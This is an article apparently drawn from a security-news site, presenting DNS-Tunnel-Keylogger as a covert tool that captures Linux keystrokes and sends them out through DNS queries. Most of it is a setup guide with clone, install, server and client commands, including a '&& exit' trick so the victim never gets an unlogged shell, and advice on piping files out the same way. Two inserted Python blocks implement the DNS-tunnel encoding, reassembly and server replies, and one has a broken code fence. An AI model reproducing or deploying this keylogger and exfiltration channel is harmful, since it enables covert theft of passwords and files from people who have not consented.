DNS Tunnel Keylogger – An Offensive Post-Exploitation Tool For Pentesters
A new keylogging server and client tool has been released on GitHub for pentesters. The tool uses DNS tunneling to transmit keystrokes through firewalls, covertly and with a view to evading detection.
The tool, DNS-Tunnel-Keylogger, was designed for post-exploitation activities by pentesters and emphasizes lightweight exfiltration and persistence to reduce the chances of being discovered by security systems.
The server component of the tool is written in Python 3 and requires the installation of its dependencies via pip.
It listens by default on UDP port 53, though users can specify a different port with the -p flag. The IP address given on the command line is used in the SOA and NS records the server serves for its domain, so that other nameservers can locate it.
Users are advised to set their domain's nameservers to custom DNS and point them at the exfiltration server's IP address, which amounts to setting glue records in the parent zone.
DNS tunneling is a technique for encoding the data of other programs or protocols in DNS queries and responses.
It can be particularly useful for post-exploitation data extraction while evading detection and firewall restrictions, because outbound DNS is almost always permitted and the queries travel through the victim's own resolvers to the attacker-controlled authoritative server.
Prerequisites
- Knowledge of DNS and networking concepts
- Familiarity with Python and Bash scripting
- A Linux environment for the keylogger client
- Python 3 installed on the server
On the client side, the Linux keylogger consists of two bash scripts. The connection.sh
script is responsible for sending the captured keystrokes to the server, while the logger.sh
script is used to start the keylogging process.
The keylogger can be started silently, and the shell can be closed upon exit to avoid returning the user to a non-keylogged shell.
The developers note that the keylogger will not run in non-interactive shells and that the Windows Dns_Query_A
function tends to send duplicate requests, though the server is designed to handle this by discarding repeated packets.
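The encoding step described earlier (keystrokes packed into query names under the attacker's domain) and the duplicate handling noted above (repeated packets discarded on the server), as an added Python example that is not part of the original article or of the DNS-Tunnel-Keylogger project. The label layout seq.base32-chunks.domain, the 10-byte chunk size, the domain exfil.example.com and the sample keystrokes are all assumptions made for illustration; the page does not describe the tool's real format.

```python
import base64

# Added example, not code from the DNS-Tunnel-Keylogger project: the label
# layout (<seq>.<base32 chunks>.<domain>) and the chunk size are assumptions
# chosen to illustrate the technique, not the tool's actual wire format.
MAX_LABEL = 63     # RFC 1035 limit per label
MAX_NAME = 253     # RFC 1035 limit for a presentation-format name


def encode_chunk(seq: int, data: bytes, domain: str) -> str:
    """Pack one chunk of keystrokes into a query name under `domain`.

    The sequence number is the first label so the server can reorder
    chunks and recognise retransmissions; the payload is base32 because
    DNS labels are case-insensitive and restricted to [a-z0-9-].
    """
    payload = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [payload[i:i + MAX_LABEL] for i in range(0, len(payload), MAX_LABEL)]
    name = ".".join([str(seq), *labels, domain])
    if len(name) > MAX_NAME:
        raise ValueError("chunk too large for a single query name")
    return name


def decode_chunk(qname: str, domain: str) -> tuple[int, bytes]:
    """Inverse of encode_chunk; raises if the name is not under `domain`."""
    suffix = "." + domain
    if not qname.endswith(suffix):
        raise ValueError("query is not for the exfiltration domain")
    labels = qname[: -len(suffix)].split(".")
    seq = int(labels[0])
    payload = "".join(labels[1:]).upper()
    payload += "=" * (-len(payload) % 8)    # restore base32 padding
    return seq, base64.b32decode(payload)


def chunk_stream(data: bytes, domain: str, chunk_size: int = 10) -> list[str]:
    """Client side: split captured bytes into numbered query names."""
    return [
        encode_chunk(seq, data[i:i + chunk_size], domain)
        for seq, i in enumerate(range(0, len(data), chunk_size))
    ]


class Reassembler:
    """Server side: collect chunks by sequence number, dropping repeats.

    A Windows resolver (the page mentions Dns_Query_A) may send the same
    query more than once, so the server must treat a repeated sequence
    number as a retransmission rather than as new keystrokes.
    """

    def __init__(self, domain: str) -> None:
        self.domain = domain
        self.chunks: dict[int, bytes] = {}
        self.duplicates = 0

    def feed(self, qname: str) -> bool:
        seq, data = decode_chunk(qname, self.domain)
        if seq in self.chunks:
            self.duplicates += 1          # discard the repeated packet
            return False
        self.chunks[seq] = data
        return True

    def data(self) -> bytes:
        return b"".join(self.chunks[s] for s in sorted(self.chunks))


def demo() -> tuple[bytes, int, int]:
    """Round-trip a constructed keystroke sample over a 'wire' that
    delivers every query twice, as a duplicating resolver would."""
    domain = "exfil.example.com"                      # assumed domain
    keystrokes = b"ssh admin@10.0.0.5\nPassw0rd!\n"   # constructed sample input
    queries = chunk_stream(keystrokes, domain)
    on_wire = [q for q in queries for _ in (0, 1)]    # each query retransmitted once
    server = Reassembler(domain)
    for q in on_wire:
        server.feed(q)
    return server.data(), server.duplicates, len(queries)


if __name__ == "__main__":
    recovered, dupes, sent = demo()
    print(f"sent {sent} queries, dropped {dupes} duplicates")
    print(recovered.decode())
```

Sequence numbers, not the chunk contents, are what make the duplicate check safe: without them a user typing the same characters twice would look like a retransmission, and a caching resolver would answer the second identical query itself without ever forwarding it to the server.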
DNS Tunnel Keylogger – Server Setup
Step 1: Clone the Repository
First, clone the DNS-Tunnel-Keylogger repository from GitHub:
git clone https://github.com/Geeoon/DNS-Tunnel-Keylogger.git
Step 2: Install Dependencies
Navigate to the cloned directory and install the required Python dependencies:
cd DNS-Tunnel-Keylogger
python3 -m pip install -r requirements.txt
Step 3: Start the Server
To start the server, use the following command:
python3 main.py <ip> <domain>
Replace <ip> with the IP address of the server and <domain> with the domain that the server is authoritative for.
Server Options:
-h, --help: Display the help message and exit.
-p PORT, --port PORT: Specify a different port to listen on. By default, the server listens on UDP port 53.
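What the server actually receives on UDP port 53, as an added Python example that is not from the article or from the project: the client builds a raw DNS query whose QNAME carries the tunnelled labels, and the server parses the question and answers authoritatively. The acknowledgement as a single A record for 127.0.0.1, the transaction ID and the sample name are assumptions for illustration; the page does not describe the tool's real reply format. The socket handling on the privileged port is left out so that the functions operate on bytes and can be exercised offline.

```python
import struct

# Added example, not code from the DNS-Tunnel-Keylogger project. The A-record
# acknowledgement and the 127.0.0.1 answer are assumptions for illustration.

QTYPE_A = 1
QCLASS_IN = 1
FLAG_QR = 0x8000   # response bit
FLAG_AA = 0x0400   # authoritative answer
FLAG_RD = 0x0100   # recursion desired (copied from the query)


def encode_name(name: str) -> bytes:
    """Presentation name -> wire format: length-prefixed labels, zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= 63:
            raise ValueError(f"bad label length: {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(packet: bytes, offset: int) -> tuple[str, int]:
    """Wire format -> presentation name; returns (name, offset after it)."""
    labels = []
    while True:
        length = packet[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointers are not expected in a question")
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def build_query(txn_id: int, qname: str, qtype: int = QTYPE_A) -> bytes:
    """Client side: a standard recursive query for `qname`."""
    header = struct.pack("!HHHHHH", txn_id, FLAG_RD, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(packet: bytes) -> tuple[int, int, str, int, int]:
    """Server side: return (txn_id, flags, qname, qtype, end_of_question)."""
    txn_id, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    if flags & FLAG_QR:
        raise ValueError("packet is a response, not a query")
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    qname, offset = decode_name(packet, 12)
    qtype, qclass = struct.unpack("!HH", packet[offset:offset + 4])
    if qclass != QCLASS_IN:
        raise ValueError("only class IN is handled")
    return txn_id, flags, qname, qtype, offset + 4


def build_response(query: bytes, answer_ip: str) -> bytes:
    """Echo the question back with one A record pointing at `answer_ip`.

    The answer uses a compression pointer (0xC00C) to the QNAME at offset 12,
    which keeps the reply well under the 512-byte UDP limit.
    """
    txn_id, flags, _qname, _qtype, end = parse_query(query)
    header = struct.pack("!HHHHHH", txn_id, FLAG_QR | FLAG_AA | (flags & FLAG_RD), 1, 1, 0, 0)
    rdata = bytes(int(octet) for octet in answer_ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, 0, len(rdata)) + rdata
    return header + query[12:end] + answer


def exchange(qname: str, txn_id: int = 0x1234) -> tuple[str, bytes]:
    """One round trip: the client builds the query, the server extracts the
    tunnelled name and replies. Returns (name the server saw, raw response)."""
    query = build_query(txn_id, qname)
    _, _, seen, _, _ = parse_query(query)
    return seen, build_response(query, "127.0.0.1")


if __name__ == "__main__":
    seen, reply = exchange("3.mfrgg.exfil.example.com")   # constructed tunnel name
    print("server saw:", seen)
    print("reply:", reply.hex())
</```

Answering every query matters operationally: a resolver that gets no reply retries and eventually returns SERVFAIL to the client, which stalls the keylogger and produces exactly the timeout pattern that DNS monitoring flags.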
Client Setup (Linux Keylogger)
Step 1: Prepare the Scripts
Make sure that logger.sh
and connection.sh
are in the same directory. These scripts capture the keystrokes and send them to the server.
Step 2: Start the Keylogger
To start the keylogger, run the following command:
./logger.sh <domain> && exit
Replace <domain> with the domain to send data to. The && exit
will close the shell when the keylogged session ends, so the user is never returned to a non-keylogged shell.
Keylogger Options:
-p path: Specify the path to the log file to listen to. By default, this is /tmp/
-l: Run the logger with warnings and errors printed, which can be helpful for debugging.
Additional Information
Manual Data Transmission
If you need to send data, such as a file, manually, you can pipe the data into the connection.sh
script, which will establish a connection and send the data over the same DNS channel.
Security Considerations
If used without proper authorization, a keylogger and DNS tunneling may be considered malicious and are illegal in many jurisdictions. Make sure you are permitted to use these tools in your environment and follow all relevant laws and ethical guidelines.
Troubleshooting
- If you encounter issues, remove the &> /dev/null redirection used when starting the keylogger silently so that error messages are shown, or run logger.sh with the -l flag.
- Check the server's firewall settings to make sure the DNS port (default 53) is open for incoming and outgoing traffic.
- Verify that the domain used is correctly configured and that the server is set as authoritative for it; a query that never reaches the server is the most common cause of a silent failure.
This guide covers the steps to set up a DNS tunneling keylogger for covert keystroke exfiltration. Be sure to use this tool responsibly and within the law.
Source credit: cybersecuritynews.com